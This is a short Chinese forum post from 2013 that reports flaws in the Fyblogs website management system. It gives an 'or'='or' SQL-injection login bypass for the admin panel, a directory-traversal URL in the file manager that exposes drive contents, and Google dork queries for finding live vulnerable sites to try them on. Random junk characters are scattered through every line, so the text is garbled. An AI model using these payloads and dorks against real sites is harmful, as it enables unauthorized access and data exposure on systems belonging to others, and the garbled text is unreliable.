漏洞类型: 未授权访问/权限绕过
) H7 X; V1 P# s$ O r/ x# H! [- E: s, n. \" L6 U$ |
简要描述:& W; ?2 a& ?$ u8 w$ r8 V
' v. v g9 \" l5 M/ D3 y
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!" x$ t7 F! B* Q* |* b; ?
# r0 h2 Y* B+ i8 N
详细说明:
. u6 Z* o' q( V; t" q" d. v
% m+ T+ u0 ]2 P1 D! M& {+ `3 p5 h后台万能密码 'or'='or' R$ W4 D/ S6 R8 v9 S( L- Z
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
4 P# ?7 g5 t( @, q) radmin/uploadfile.asp?currentFolder=/upfiles/../
" D7 o0 X' a! S' S! e' |
; q3 @6 _: n' ]7 p, w/ {1 o* E漏洞证明:
% o. c- ? p4 k* Y0 E* o; c, @+ A/ r. V% K1 ]! y. m5 J
谷歌:inurl:type.asp?id=1 新闻中心
- ~8 T) G; j( Q, I1 v或者 :inurl:download_ok.asp?
) q7 j0 P8 f1 |4 C
* V) ^ B3 |4 V& `可以测试
2 ~3 Y+ p$ l5 [3 W6 {
: q+ \* [' g* _
+ {, q5 b$ N0 v6 G7 n" q e; g |
发表于 2013-3-7 13:07:46
收藏
支持
反对